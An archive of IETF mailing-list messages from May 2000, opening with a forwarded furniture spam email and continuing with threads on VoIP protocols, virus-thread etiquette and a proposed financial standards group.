>>Arabian Knights Collection of "Exquisite Area Rugs"
>><http://furniture-giveaway.com/flooring/rugs/index.html>Read On...
>>
>><http://furniture-giveaway.com/furniture/garden/index.html> All Garden
>>Furniture, 15% off.
>><http://furniture-giveaway.com/furniture/garden/catalog.html>Click here...
>>
>><http://furniture-giveaway.com/flooring/hardwood/index.html> Hot Prices
>>on Ash and Cherry
>><http://furniture-giveaway.com/flooring/hardwood/special.html>Check 'em
>>out...
>>
>><http://furniture-giveaway.com/furniture/leather/index.html> Overstock
>>Model Blowout! <http://furniture-giveaway.com/furniture/leather/special.html>
>>Read On...
>>
>><http://www.furniture-giveaway.com/furniture/solidwood/catalog.html>
>>Solid Hardwood Bedroom and Dining Furniture.
>><http://www.furniture-giveaway.com/furniture/solidwood/catalog.html>Read
>>On...
>>
>>
>><mailto: [EMAIL PROTECTED]>Send Us E-Mail
--=====================_17877473==_.ALT
Content-Type: text/html; charset="us-ascii"
<html>
<br>
<font size=5 color="#FF0000"><b>Someone is using your mailing list for
spam!!!!<br>
<br>
</font></b><blockquote type=cite cite>Return-Path:
<[EMAIL PROTECTED]><br>
Received: from ogopogo.flash.net ([209.30.2.14])<br>
by
mtiwgwc28.worldnet.att.net<br>
(InterMail
vM.4.01.02.39 201-229-119-122) with ESMTP<br>
id
<[EMAIL PROTECTED]><br>
for
<[EMAIL PROTECTED]>; Sat, 13 May 2000 16:27:24 +0000<br>
Received: from ietf.org (odin.ietf.org [132.151.1.176])<br>
<x-tab> </x-tab>by
ogopogo.flash.net (8.9.3/Pro-8.9.3) with ESMTP id LAA06039;<br>
<x-tab> </x-tab>Sat, 13
May 2000 11:27:23 -0500 (CDT)<br>
From: [EMAIL PROTECTED]<br>
Received: from furniture-giveaway.com ([204.120.0.7])<br>
<x-tab> </x-tab>by
ietf.org (8.9.1a/8.9.1a) with SMTP id MAA09534<br>
<x-tab> </x-tab>for
<[EMAIL PROTECTED]>; Sat, 13 May 2000 12:16:27 -0400
(EDT)<br>
To: [EMAIL PROTECTED]<br>
Subject: $5000 in Exquisite Quality Home Furnishings Absolutely
Free<br>
Date: Sat, 13 May 2000 12:17:51<br>
Message-Id: <[EMAIL PROTECTED]><br>
Reply-To: [EMAIL PROTECTED]<br>
Mime-Version: 1.0<br>
Content-Type: text/html; charset="us-ascii"<br>
<br>
<a href="http://furniture-giveaway.com/index.html"><br>
</a><b><a href="http://furniture-giveaway.com/index.html">WELCOME TO
BEAVERHOME</a></b> <br>
<a href="http://furniture-giveaway.com/index.html"><br>
</a><a href="http://furniture-giveaway.com/contact.html"><br>
</a><a href="http://furniture-giveaway.com/ordering.html"><br>
</a><a href="http://furniture-giveaway.com/shipping.html"><br>
</a><a href="http://furniture-giveaway.com/survey.html"><br>
</a><a href="http://furniture-giveaway.com/privacy.html"><br>
</a><a href="http://furniture-giveaway.com/about.html"><br>
</a><br>
<br>
<br>
<dl><h2><b>
<dd>Find L.G. the Dog <font size=5 color="#CC0000">$5,000
BeaverBucks</font> Giveaway</b></h2><br>
<br>
<br>
<br>
<br>
<br>
<blockquote>
<dd>Why... <br>
<br>
<dd>...would
<a href="http://furniture-giveaway.com/index.html">BeaverHome</a>, a
manufacturer of "Exquisite quality home furnishings, sensibly
priced."(TM) give away
<a href="http://furniture-giveaway.com/5000giveaway.html">$5,000
BeaverBucks?</a> <br>
<br>
<dd>It's simple. Three reasons!
</dl>
<ol>
<li>We have proudly admitted that there is not one good brain cell left
among our stressed-out marketing Beavers. We are just a bunch of
hard-working, hard-playing, fun-loving Beavers. Our web sites are beloved
among consumers, as it is our customers that have directed our web site
design for the last three years. So, who else to ask how to make our
business even better, than you, our customer! We are giving away $5,000
BeaverBucks in exchange for information and for your guidance.
<li>The transition from Spring to Summer is a wonderful time for our
human friends. Beavers are no different. We come out of our lodges, and
we sun bathe, and feel all warm and fuzzy. We want one family to feel
like a Beaver warming himself in the Spring to Summer transition. What
better way to celebrate then to be informed that on the first day of
summer 2000, you had won $5,000 dollars to makeover your home?
<li>By using the information you provide us in this survey we learn more
about what each of you are looking for in home furnishings products. This
helps us plan production. We can develop special runs of a particular
product. If we plan to produce 100 teak sun loungers, rather than 10, our
cost of production goes down by the efficiency of the run. With increases
in efficiency, and therefore lower production costs, we can pass on even
greater savings to you all, above our already silly BeaverPricing.
</ol><br>
<br>
</blockquote><h2><b>Rules</b></h2><br>
<br>
<blockquote>Here are the rules...
<ul>
<li>You must agree to help find L.G. The Beavers need your help. If the
Big Beaver does not find his little dog, everyone will be miserable here
in the BeaverPond.
<li>You must fill-out the questionnaire in its entirety. Any uncompleted
questionnaires will not qualify for the draw.
<li>You agree to accept our weekly e-mailer for a minimum of 12 weeks. If
at any time after that you choose to be removed from our e-mail list, we
will do so immediately upon your request. It is unlikely anyone would
want to be removed, frankly our graphically enhanced e-mailer is so much
fun and so well designed, and many people tell us they wait on Saturday
afternoon for their arrival. However, if after the 12 weeks you want off
the list, we will comply with your request.
<li>$5,000 BeaverBucks can be applied toward any BeaverHome flooring,
furniture, door/trim and/or kitchen/bath product, and can be combined
with any running specials.
<li>All entrants must be 18 or over, or submit the survey on behalf of
their parents.
<li>Beavers, Squirrels and their families CAN NOT participate in this
contest!
</ul>If you accept the rules above, please
<a href="http://furniture-giveaway.com/5000.htm">proceed</a> by following
the link behind the icon below!<br>
<br>
<br>
<br>
<div align="center">
<br>
</div>
If you need assistance with any of our product lines, do not hesitate to
give us a call, toll-free at: 1 (888) 595-HOME (4663)! <br>
<br>
You can reach our Customer Service Beavers Mon-Sat 7am-9pm. <br>
<div align="center">
<br>
</div>
<br>
In a constant effort to be known as responsible members of the Internet
community,
<a href="http://furniture-giveaway.com/index.html">BeaverHome</a> will
forward any removal requests to the E Mail preference service that is
provided by the Direct Marketing Association. The URL is
<a href="http://www.e-mps.org/en/">http://www.e-mps.org/en/</a> and is
designed to cut down on the amount of commercial e-mail consumers receive
in their e-mail. <br>
<br>
If you have recieved this email in error or would like to be removed,
either fill in your email address in the form below and click remove
<a href="mailto: [EMAIL PROTECTED]? Subject=Remove">"REMOVE"</a>
or call our automated removal service toll free 877 899 2399! <br>
<div align="center">
html text subscribe remove <br>
</div>
<br>
This message and its entire contents are (c)2000 by <a
href="http://furniture-giveaway.com/index.html">BeaverHome</a> and may not be
reproduced in any form without prior written permission from <a
href="http://furniture-giveaway.com/index.html">BeaverHome</a> <br>
<br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/5000giveaway.html"> </a> Enter to win
$5000 in BeaverBucks<br>
<a href="http://furniture-giveaway.com/5000giveaway.html">Read on...</a> <br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/flooring/jstone/index.html"> </a>
LimeStone, from Israel directly to your Home. <br>
<a href="http://furniture-giveaway.com/flooring/jstone/index.html">Click to learn
more...</a> <br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/flooring/rugs/index.html"> </a> Introduces
the Arabian Knights Collection of "Exquisite Area Rugs"<br>
<a href="http://furniture-giveaway.com/flooring/rugs/index.html">Read On...</a> <br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/furniture/garden/index.html"> </a> All
Garden Furniture, 15% off.<br>
<a href="http://furniture-giveaway.com/furniture/garden/catalog.html">Click
here...</a> <br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/flooring/hardwood/index.html"> </a> Hot
Prices on Ash and Cherry<br>
<a href="http://furniture-giveaway.com/flooring/hardwood/special.html">Check 'em
out...</a> <br>
<div align="center">
<br>
</div>
<a href="http://furniture-giveaway.com/furniture/leather/index.html"> </a>
Overstock Model Blowout! <a
href="http://furniture-giveaway.com/furniture/leather/special.html"><br>
Read On...</a> <br>
<div align="center">
<br>
</div>
<a
href="http://www.furniture-giveaway.com/furniture/solidwood/catalog.html"> </a>
Solid Hardwood Bedroom and Dining Furniture.<br>
<a href="http://www.furniture-giveaway.com/furniture/solidwood/catalog.html">Read
On...</a> <br>
<br>
<br>
<div align="center">
<a href="mailto: [EMAIL PROTECTED]">Send Us E-Mail</a> </blockquote></html>
--=====================_17877473==_.ALT--
>From owner-ietf-outbound Sat May 13 17:30:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA11945
for [EMAIL PROTECTED]; Sat, 13 May 2000 17:30:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA11922
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 17:29:36 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id XAA31266;
Sat, 13 May 2000 23:29:22 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sat, 13 May 2000 23:27:10 +0200
To: Masataka Ohta <[EMAIL PROTECTED]>,
Christian Huitema <[EMAIL PROTECTED]>
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Cc: "'Yixin Zhu'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
References:
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 09:19 13.05.2000 +0859, Masataka Ohta wrote:
>For VoIP over telephony networks (that is, mostly over non-Internet
>networks), H.323 and SS7 are the protocols to choose, because they
>are defined by ITU-T.
H.323 is defined for a LAN environment, not for telephone lines.
SS7 is not a protocol accessible to the subscriber.
If you want to use ITU protocols, please choose some other numbers.
Harald
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Sat May 13 19:50:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA12728
for [EMAIL PROTECTED]; Sat, 13 May 2000 19:50:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA12694
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 19:44:21 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id IAA06106; Sun, 14 May 2000 08:32:44 +0900
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
In-Reply-To: <[EMAIL PROTECTED]> from Harald Tveit
Alvestrand at "May 13, 2000 11:27:10 pm"
To: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Date: Sun, 14 May 2000 08:32:44 +0859 ()
CC: Christian Huitema <[EMAIL PROTECTED]>,
"'Yixin Zhu'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Harald;
> At 09:19 13.05.2000 +0859, Masataka Ohta wrote:
> >For VoIP over telephony networks (that is, mostly over non-Internet
> >networks), H.323 and SS7 are the protocols to choose, because they
> >are defined by ITU-T.
> H.323 is defined for a LAN environment, not for telephone lines.
For telephony people, the IP protocol is for a LAN environment
that there is no difference between H.323, SIP, TELNET, or DNS
for that matter.
> SS7 is not a protocol accessible to the subscriber.
So?
As I said:
> >For VoIP over telephony networks
some protocol is necessary between two telephony networks.
FYI, there is a protocol called TBGP proposed in IETF for the purpose.
> If you want to use ITU protocols, please choose some other numbers.
So, you are saying SGCP/MGCP are wrong to use 323.
Fine.
FYI, in my design of "The Simple Internet Phone":
If you are interested in Internet telephony, see you at
INET'2000 in Yokohama for the presentation of our paper
"The Simple Internet Phone".
I chose to keep using 164 (sorry, not 42) at least for the time being,
because it is the easiest way to let subscribers replace telephony
network with the Internet.
Masataka Ohta
>From owner-ietf-outbound Sat May 13 22:40:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA15930
for [EMAIL PROTECTED]; Sat, 13 May 2000 22:40:02 -0400 (EDT)
Received: from mauve.innosoft.com (DSL107-055.brandx.net [209.55.107.55])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA15861
for <[EMAIL PROTECTED]>; Sat, 13 May 2000 22:33:11 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from mauve.mrochek.com by mauve.mrochek.com (PMDF V6.1-1 #35243)
id <[EMAIL PROTECTED]> for [EMAIL PROTECTED]; Sat,
13 May 2000 19:33:01 -0800 (PST)
Date: Sat, 13 May 2000 19:31:26 -0800 (PST)
Subject: Re: VIRUS WARNING
In-reply-to: "Your message dated Fri, 12 May 2000 14:05:07 -0400"
<[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> On Fri, 12 May 2000 13:38:43 EDT, Jeremy said:
> > Can you plase pleaes stop this Virus Thread.
> Actually, there *ARE* important issues here.
> Would the IESG support the creation of a WG to discuss these, with the
> charter of producing a BCP documenting what *should* be done to minimize
> these risks in today's internet?
Talking about a WG seems premature. The first step would be to start a
discussion list and maybe schedule a BOF. If those steps prove fruitful
a WG would be a possibility.
I can set up a mailing list if you like.
Ned
>From owner-ietf-outbound Sun May 14 03:21:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA02219
for [EMAIL PROTECTED]; Sun, 14 May 2000 03:20:02 -0400 (EDT)
Received: from arcc.or.ke (root@[212.49.87.254])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id DAA01121
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 03:11:40 -0400 (EDT)
Received: from 199.2.222.254 ([199.2.222.124])
by arcc.or.ke (8.9.3/8.9.3) with SMTP id KAA03422
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 10:33:53 +0300 (EAT)
Date: Sun, 14 May 2000 10:33:53 +0300 (EAT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: [EMAIL PROTECTED]
From: Musandu <[EMAIL PROTECTED]>
Subject: Financial Standards Work group?
X-Loop: [EMAIL PROTECTED]
It may just be time for the IETF to develop a financial standards work group
seperate from the applications work group. I can even forsee a Simple Cash
Transfer Protocol? any objections?
Yours sincerely,
Nyagudi Musandu
>From owner-ietf-outbound Sun May 14 03:30:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA03632
for [EMAIL PROTECTED]; Sun, 14 May 2000 03:30:02 -0400 (EDT)
Received: from arcc.or.ke (root@[212.49.87.254])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id DAA01112
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 03:11:37 -0400 (EDT)
Received: from 199.2.222.254 ([199.2.222.124])
by arcc.or.ke (8.9.3/8.9.3) with SMTP id KAA03409
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 10:33:49 +0300 (EAT)
Date: Sun, 14 May 2000 10:33:49 +0300 (EAT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: [EMAIL PROTECTED]
From: Musandu <[EMAIL PROTECTED]>
Subject: VIRUSES ARE PROFITABLE???
X-Loop: [EMAIL PROTECTED]
Could the anti virus industry exist without viruses?? or Some Free lance
anti virus guys ever earn a living. The bottom line is that viruses are
profitable ( one man's food is another man's poison ). The internet is just
a refined vector / agent for spreading viruses. So why don't you isolate
your important information from the internet, including back ups for your
web servers and open attachments on offline isolated computers also remember
to do your browsing on seperate computers. That may reduce disaster
vunerability by about 5%.
I can forsee a virus coming in the next five years that will burn quiet and
number of graphic cards, mother boards, CRTs and etc.. That is if virus
manufacturers have ever read the xfree86 source code.
Yours sincerely,
Nyagudi Musandu.
>From owner-ietf-outbound Sun May 14 13:30:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA09832
for [EMAIL PROTECTED]; Sun, 14 May 2000 13:30:02 -0400 (EDT)
Received: from winery.garlic.com (winery-et0b.garlic.com [216.139.31.163] (may be
forged))
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA09803
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 13:29:12 -0400 (EDT)
Received: from lynnpc (lynn-17.garlic.com [208.195.167.17])
by winery.garlic.com (8.10.0/8.10.0) with ESMTP id e4EHTBf75424;
Sun, 14 May 2000 10:29:11 -0700
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Sun, 14 May 2000 10:28:21 -0700
To: [EMAIL PROTECTED]
From: Anne & Lynn Wheeler <[EMAIL PROTECTED]>
Subject: re: Financial Stnadards Work group?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
Musandu <[EMAIL PROTECTED]> writes:
>It may just be time for the IETF to develop a financial standards
>work group separate from the applications work group. I can even >forsee
a Simple Cash Transfer Protocol? any objections?
There is an ANSI Financial Standards body (X9) which is also chair of the
ISO Financial Standards group.
The electronic commerce payments working group (X9A10) has a draft standard
for all electronic retail payments (debit, credit, pre-paid, electronic
cash, etc) .. X9.59.
misc. ref
http://www.x9.org/
http://www.x9.org/main_organization.html
http://www.x9.org/subcomms/x9a/general/public/general.html
http://www.tc68.org/
http://www.x9.org/n20.html
http://www.garlic.com/~lynn/
http://www.garlic.com/~lynn/99.html#224
http://www.garlic.com/~lynn/8583flow.htm
http://www.garlic.com/~lynn/draft-wheeler-ipki-aads-01.txt
& of course my rfc index is also at:
http://www.garlic.com/~lynn/rfcietff.htm
as well as ietf, payments, security, X9F, and financial glossaries
--
Anne & Lynn Wheeler [EMAIL PROTECTED], [EMAIL PROTECTED]
http://www.garlic.com/~lynn/ http://www.adcomsys.net/lynn/
>From owner-ietf-outbound Sun May 14 17:50:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA11563
for [EMAIL PROTECTED]; Sun, 14 May 2000 17:50:01 -0400 (EDT)
Received: from smtp6.mindspring.com (smtp6.mindspring.com [207.69.200.110])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA11538
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 17:49:04 -0400 (EDT)
Received: from nixon.nextlink.com (user-2ive0m4.dialup.mindspring.com [165.247.2.196])
by smtp6.mindspring.com (8.9.3/8.8.5) with ESMTP id RAA27389;
Sun, 14 May 2000 17:49:01 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 14 May 2000 16:34:45 -0400
To: Jeremy <[EMAIL PROTECTED]>
From: Henry Clark <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 01:38 PM 5/12/00 -0400, Jeremy wrote:
>Can you plase pleaes stop this Virus Thread.
This thread _is_ the virus...
>From owner-ietf-outbound Sun May 14 21:20:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA13021
for [EMAIL PROTECTED]; Sun, 14 May 2000 21:20:01 -0400 (EDT)
Received: from motgate2.mot.com (motgate2.mot.com [136.182.1.10])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA12987
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 21:17:14 -0400 (EDT)
Received: [from mothost.mot.com (mothost.mot.com [129.188.137.101]) by
motgate2.mot.com (motgate2 2.1) with ESMTP id SAA26117; Sun, 14 May 2000 18:17:15
-0700 (MST)]
Received: [from relay1.cig.mot.com (relay1.cig.mot.com [136.182.15.23]) by
mothost.mot.com (MOT-mothost 2.0) with ESMTP id SAA24883; Sun, 14 May 2000 18:17:15
-0700 (MST)]
Received: from agevole.cig.mot.com (agevole [136.182.3.251]) by relay1.cig.mot.com
(8.8.8+Sun/SCERG-RELAY-1.11b) with ESMTP id UAA05853; Sun, 14 May 2000 20:14:36 -0500
(CDT)
Received: from cig.mot.com (mvp1.corp.mot.com [129.188.147.11]) by agevole.cig.mot.com
(8.7.5 Motorola CIG/ITS v1.1 (Solaris 2.5)) with ESMTP id UAA05218; Sun, 14 May 2000
20:14:32 -0500 (CDT)
Message-Id: <[EMAIL PROTECTED]>
Date: Sun, 14 May 2000 20:15:51 -0500
From: Qiaobing Xie <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.7 [en]C-CCK-MCD {Sony} (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Musandu <[EMAIL PROTECTED]>
CC: [EMAIL PROTECTED]
Subject: Re: Financial Standards Work group?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Maybe with a different name... "SCTP" has already been taken by Stream
Control Transmission Protocol :-)
-Qiaobing Xie
Musandu wrote:
>
> It may just be time for the IETF to develop a financial standards work group
> seperate from the applications work group. I can even forsee a Simple Cash
> Transfer Protocol? any objections?
>
> Yours sincerely,
> Nyagudi Musandu
>From owner-ietf-outbound Sun May 14 22:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA14323
for [EMAIL PROTECTED]; Sun, 14 May 2000 22:10:02 -0400 (EDT)
Received: from muSys.com (techno.musys.com [199.190.178.75])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA14299
for <[EMAIL PROTECTED]>; Sun, 14 May 2000 22:06:55 -0400 (EDT)
Received: (from miyata@localhost)
by muSys.com (8.8.6/8.8.6) id WAA16369
for [EMAIL PROTECTED]; Sun, 14 May 2000 22:06:57 -0400 (EDT)
Date: Sun, 14 May 2000 22:06:57 -0400 (EDT)
From: "Gaylord K. Miyata" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
X-Sun-Charset: US-ASCII
X-Loop: [EMAIL PROTECTED]
speaking of telephony/telecom protocols, are there any "voice subscriber"
MIBs/models - SNMP or CMIP oriented. I'm just looking for a model used
for voice subscribers who are provisioned w/ some combination of AAL2,
VOIP, GR-303, V.52.
Thanks
- gaylord
>From owner-ietf-outbound Mon May 15 05:31:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA29839
for [EMAIL PROTECTED]; Mon, 15 May 2000 05:30:02 -0400 (EDT)
Received: from fepE.post.tele.dk (fepE.post.tele.dk [195.41.46.137])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA29794
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 05:21:45 -0400 (EDT)
Received: from Anders ([194.239.165.181]) by fepE.post.tele.dk
(InterMail vM.4.01.02.00 201-229-116) with SMTP
id <20000515092145.VQYY11116.fepE.post.tele.dk@Anders>
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 11:21:45 +0200
Message-ID: <001901bfbe4e$fb5bfee0$1000000a@DIC>
From: "Anders Feder" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: VIRUSES ARE PROFITABLE???
Date: Mon, 15 May 2000 11:21:35 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
> ... why don't you isolate
> your important information from the internet, including back ups for your
> web servers and open attachments on offline isolated computers also
remember
> to do your browsing on seperate computers. That may reduce disaster
> vunerability by about 5%.
If you are so rich that you can afford one seperate computer for each little
task to accomplish, please send me
some money. It seems that you have plenty.
- Anders Feder
>From owner-ietf-outbound Mon May 15 05:40:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA00022
for [EMAIL PROTECTED]; Mon, 15 May 2000 05:40:03 -0400 (EDT)
Received: from fepE.post.tele.dk (fepE.post.tele.dk [195.41.46.137])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA29801
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 05:21:58 -0400 (EDT)
Received: from Anders ([194.239.165.181]) by fepE.post.tele.dk
(InterMail vM.4.01.02.00 201-229-116) with SMTP
id <20000515092159.VQZM11116.fepE.post.tele.dk@Anders>
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 11:21:59 +0200
Message-ID: <001a01bfbe4f$03729d00$1000000a@DIC>
From: "Anders Feder" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: VIRUSES ARE PROFITABLE???
Date: Mon, 15 May 2000 11:21:35 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
> ... why don't you isolate
> your important information from the internet, including back ups for your
> web servers and open attachments on offline isolated computers also
remember
> to do your browsing on seperate computers. That may reduce disaster
> vunerability by about 5%.
If you are so rich that you can afford one seperate computer for each little
task to accomplish, please send me
some money. It seems that you have plenty.
- Anders Feder
>From owner-ietf-outbound Mon May 15 09:00:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA02795
for [EMAIL PROTECTED]; Mon, 15 May 2000 09:00:02 -0400 (EDT)
Received: from osd.mil ([EMAIL PROTECTED] [140.185.28.36])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA02716
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 08:53:49 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: by osd.mil; id HAA22536; Mon, 15 May 2000 07:54:48 GMT
Received: from hqbmdofs03.bmdo.osd.mil(134.152.2.194) by gateway2.osd.mil via smap
(V4.2)
id xma021241; Mon, 15 May 00 07:53:56 GMT
Received: from mfil.terminal (mfil@localhost)
by hqbmdofs03.bmdo.osd.mil with SMTP id IAA17992;
Mon, 15 May 2000 08:21:07 -0400 (EDT)
Received: from hqbmdomsg01.bmdo.osd.mil (hqbmdomsg01.bmdo.osd.mil [172.20.100.3])
by hqbmdofs03.bmdo.osd.mil with ESMTP id IAA17754;
Mon, 15 May 2000 08:20:13 -0400 (EDT)
Received: by hqbmdomsg01.bmdo.osd.mil with Internet Mail Service (5.5.2650.21)
id <KR4QM673>; Mon, 15 May 2000 08:20:49 -0400
Message-ID: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Date: Mon, 15 May 2000 08:20:36 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
PLEASE change the title of this thread. It's borders on a partial self
denial of service, since the title is now misleading. Thank you.
Bill Flanigan
-----Original Message-----
From: Henry Clark [mailto:[EMAIL PROTECTED]]
Sent: Sunday, May 14, 2000 4:35 PM
To: Jeremy
Cc: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
At 01:38 PM 5/12/00 -0400, Jeremy wrote:
>Can you plase pleaes stop this Virus Thread.
This thread _is_ the virus...
>From owner-ietf-outbound Mon May 15 14:30:35 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA08329
for [EMAIL PROTECTED]; Mon, 15 May 2000 14:30:02 -0400 (EDT)
Received: from ce-nfs-1.cisco.com (ce-nfs-1.cisco.com [171.68.202.251])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA08303
for <[EMAIL PROTECTED]>; Mon, 15 May 2000 14:28:26 -0400 (EDT)
Received: from glock (dallas-nt-47.cisco.com [171.68.37.47])
by ce-nfs-1.cisco.com (8.8.8+Sun/8.8.8) with SMTP id LAA18595;
Mon, 15 May 2000 11:27:16 -0700 (PDT)
Message-ID: <01b601bfbe9b$33637e70$2f2544ab@glock>
From: "Stephen Sprunk" <[EMAIL PROTECTED]>
To: "Masataka Ohta" <[EMAIL PROTECTED]>,
"Harald Tveit Alvestrand" <[EMAIL PROTECTED]>
Cc: "Christian Huitema" <[EMAIL PROTECTED]>,
"'Yixin Zhu'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: Any comparison Study on MGCP vs H.323, MGCP vs SIP
Date: Mon, 15 May 2000 12:35:56 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
